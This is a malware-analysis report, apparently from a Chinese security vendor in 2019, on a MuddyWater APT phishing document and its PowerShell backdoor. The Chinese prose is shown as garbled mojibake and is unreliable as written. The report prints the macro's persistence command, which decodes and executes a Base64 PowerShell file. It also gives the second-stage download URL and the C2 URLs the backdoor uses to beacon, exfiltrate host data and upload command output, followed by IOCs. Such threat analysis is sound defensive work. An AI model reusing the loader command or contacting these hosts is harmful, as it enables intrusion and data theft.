MuddyWater£¨ÎÛË®£©×îй¥»÷Ñù±¾·ÖÎö
°ä²¼¹¦·ò 2019-05-10½üÈÕ£¬GA»Æ½ð¼×½ð¾¦°²È«×êÑÐÍŶÓͨ¹ýVenusEyeÍþвµý±¨ÖÐÐÄá÷ÁÔϵͳ²¶»ñµ½Ò»¸ö¿ÉÒÉÎĵµ£¬¾¹ý¶ÈÎöÈ·ÈÏÆäΪMuddyWater×îй¥»÷Ñù±¾¡£
ÔØºÉ·ÖÎö
¹¥»÷Ñù±¾ÎªÒ»¸öWordÎĵµ£¬´ò¿ªºó»áÏÔʾÈçÏÂͼƬ£¬ÓÕʹÊܺ¦Õ߯ôÓúꡣ
ºê´úÂëÖ´Ðк󣬻ῪÊÍc:\programdata\SysTextEnc.iniÎļþ¡£¸ÃÎļþÄÚÈÝΪһ´®Base64±àÂëÊý¾Ý¡£
¶øºóÏòÆô¶¯ÏîдÈëÈçϺÅÁîÐУº
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"
ÓÃÓÚ¿ª»ú½âÃܲ¢Ö´ÐÐc:\programdata\SysTextEnc.iniÎļþ¡£½âÃÜÖ®ºóΪһ¶Îpowershell´úÂ룬¸Ã´úÂëÓÃÓÚÒªÇóhxxp://38.132.99.167/crf.txtÁ´½ÓµÄÊý¾Ý²¢Ö´ÐУ¬¸ÃÁ´½Ó·µ»ØµÄÊý¾ÝÒÀÈ»ÊÇÒ»¶ÎPowershell´úÂë¡£
ľÂí·ÖÎö
ÉÏÊö¹ý³ÌÖÐÏÂÔØµÄPowershell´úÂë¼´MuddyWater×éÖ¯¹ßÓõÄpowershellľÂí¡£
½â»ìºÏºó£¬ÆäÖ÷º¯ÊýÈçÏÂËùʾ£º
˳´ÎÖ´ÐÐwlChecul£¬pmrHlsl£¬GECOANOO£¬gfxEcmdascrsltpÕâËĸöº¯Êý¡£ÆäÖÐwlCheculÖ»ÊÇΪÁËÈ·ÈÏ·þÎñÆ÷³ï±¸×´Ì¬¡£»ú¹ØÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËÍÒªÇó£º
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater
ÈôÊÇ·µ»ØÖµ²»Îª¿ÕÇÒ²»Îª%COPYTHAT%²Å»áÖ´ÐкóÐøº¯Êý¡£Ö®ºóÖ´ÐÐpmrHlslº¯Êý£¬¸Ãº¯Êý»áŲÓÃWMI»ñÈ¡¶àÖÖÍÆËã»úÐÅÏ¢¡£
½«»ñµÃµÄÐÅϢʹÓá°*¡±½øÐÐÆ´½Ó¡£ÍÆËãÆ´½Óºó×Ö·û´®µÄMD5£¬Ôٺ͡°*1997* EP1¡±½øÐÐÆ´½Ó£¬×îºó½øÐÐbase64±àÂë¡£
Ö®ºó½«»ú¹Ø³öÀ´µÄBase64±àÂëÊý¾ÝÆ´½Ó³ÉÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]
ÈôÊÇ·µ»ØÁ˾ֲ»Îª¿Õ²¢ÇÒ²»Îª%BYE%Ôò³ÖÐøºóÐøº¯ÊýµÄÖ´ÐС£½ÓÏÂÀ´ÒªÖ´Ðеĺ¯ÊýΪGECOANOO¡£
GeCOANOOº¯Êý»ú¹ØÈçÏÂÊý¾Ý£¬²¢ÒÔPOST·½Ê½½«Æä·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]
ÆäÖеÄEncryptedData¼´ÉÏÒ»´Î·¢ËÍÊý¾ÝÖнøÐÐBase64±àÂëµÄMD5²¿ÃÅ¡£ÈôÊÇ·µ»ØÁ˾ֲ»Îª¿ÕÇÒ·µ»ØÖµ¾¹ýbase64½âÂëºó²»Îª"SHH"£¬Ôò½«½âÂëºóµÄ·µ»ØÖµ¸³Öµ¸øÒ»¸öÈ«¾Ö±äÁ¿gecdrEu£¬¶øºóÖ´ÐÐÏÂÒ»¸öº¯Êý£¬Äܹ»Åжϸ³Öµ¸øgecdrEuµÄÊý¾ÝΪһ¶Îpowershell´úÂë¡£
×îºóͨ¹ýgfxEcmdascrsltpº¯ÊýÖ´ÐÐÈ«¾Ö±äÁ¿ÖеÄgecdrEuÖеÄpowershell´úÂë¡£
²¢½«·µ»ØÖµ½øÐÐbase64±àÂ룬ƴ´Õ³ÉÈçϵÄURLÌåʽ½øÐÐÉÏ´«¡£
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]
ËÝÔ´·ÖÎö
ͨ¹ýVenusEyeÍþвµý±¨ÖÐÐĹØÁªÏµÍ³£¬ÎÒÃÇ·¢ÏÖÁËÁíÒ»¸öÔçÆÚµÄÑù±¾¡£
¸ÃÑù±¾ËùʹÓõļ¼Êõ¶¼Óë±¾´ÎÎÒÃÇ·¢ÏÖµÄÑù±¾Ç§ÆªÒ»ÂÉ¡£
ͨ¹ýËÝÔ´·ÖÎö£¬ÎÒÃÇ·¢ÏÖÕâÁ½¸öÑù±¾¶¼ÓëÓÑÉÌ4ÔÂ10ÈÕÔÚÉ罻ýÌåÉÏÅû¶µÄMuddyWater¹¥»÷ÍÁ¶úÆäµÄÑù±¾ÀàËÆ¡£ÏÂÃæÊÇÁ½Õߵĺê´úÂë¶Ô±È¡£
Ïà±È֮ϣ¬ÔçÆÚ·¢ÏÖµÄÑù±¾½«ÉÏÏßÒªÇó¡¢»ñÈ¡powershell´úÂë¡¢ÉÏ´«ºÅÁîÐÐÖ´ÐÐÁ˾ֲð·Ö³É·ÖÆçPHP½øÐн»»¥¡£¶ø´Ë¿ÌµÄ°æ±¾ÔòʹÓÃͳһ¸öPHPÎļþ½øÐн»»¥¡£²¢ÇÒÔçÆÚ°æ±¾ÈôÊÇÔÚÖ´Ðйý³ÌÖÐÓöµ½ÃýÎó£¬Ôò»á½«ÃýÎóÐÅÏ¢¼Í¼ÈÕÖ¾£¬µ«ÊÇ×îа汾ÔòÖ±½ÓʵÏÖµ±Ç°·¨Ê½¡£
¶ÔÓÚÖ´ÐÐÁ÷³ÌÀ´Ëµ£¬×îа汾Ïà¶ÔÓÚÔçÆÚ°æ±¾Ò²Óнϴó·ÖÆç£¬¶þÕßµÄÖ´ÐÐÁ÷³ÌÈçÏ£º
Ïà±È֮ϣ¬×îÐµĹ¥»÷»î¶¯Ôö³¤ÁËÆä»ù´¡ÉèÊ©£¬²¢ÇÒ½«Ö÷Ìå´úÂë¸éÖõ½Ô¶³Ì·þÎñÆ÷Öжø²»ÊÇÖ±½Óͨ¹ý´¹µöÎĵµ¿ªÊ͵½±¾µØ¡£Äܹ»¿´³ö¸Ã×éÖ¯ÔÚ²»ÐݵĸüÐÂÆä¹¥»÷·½Ê½ºÍ·À¼ì²â·½Ê½¡£
MuddyWater×éÖ¯×ÔÅû¶֮³õÒ»Ïò»îÔ¾ÖÁ½ñ£¬¸Ã×éÖ¯¼«¶ÈÇàíùʹÓÃPowershell½ÅÕý±¾±àдÆä¹¥»÷¹¤¾ß£¬²¢ÑÜÉú³öÁ˸Ã×éÖ¯µÄרÓÐľÂíPOWERSTATS¡£¹ÌÈ»¸Ã×éÖ¯µÄPowershellľÂí¸üл»´úºÜ¿ì£¬µ«ÊÇÎÒÃÇÈÔÄÜ´ÓÆäpowershell´úÂëÖп´µ½Ð©ÐíPOWERSTATSµÄÓ°×Ó¡£
Íþвָ±ê£¨IOC£©
97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt
½â¾ö¹æ»®
1¡¢GA»Æ½ð¼×VenusEyeÍþвµý±¨ÖÐÐÄÒѾ֧³Ö¶Ô±¾´Î¹¥»÷»î¶¯Óйصý±¨µÄ²éÎÊ¡£
2¡¢ ÒѲ¿ÊðGA»Æ½ð¼×IDS¡¢IPS²úÆ·µÄ¿Í»§ÇëÉý¼¶ÊÂÎñ¿âµ½×îа汾£¬¼´¿ÉÓÐЧ¼ì²â»ò×è¶Ï¹¥»÷¡£
3¡¢ ÒѲ¿ÊðGA»Æ½ð¼×APT¼ì²â²úÆ·µÄ¿Í»§ÎÞÐèÉý¼¶£¬¼´¿ÉÓÐЧ¼ì²âÕâ´Î¹¥»÷¡£


¾©¹«Íø°²±¸11010802024551ºÅ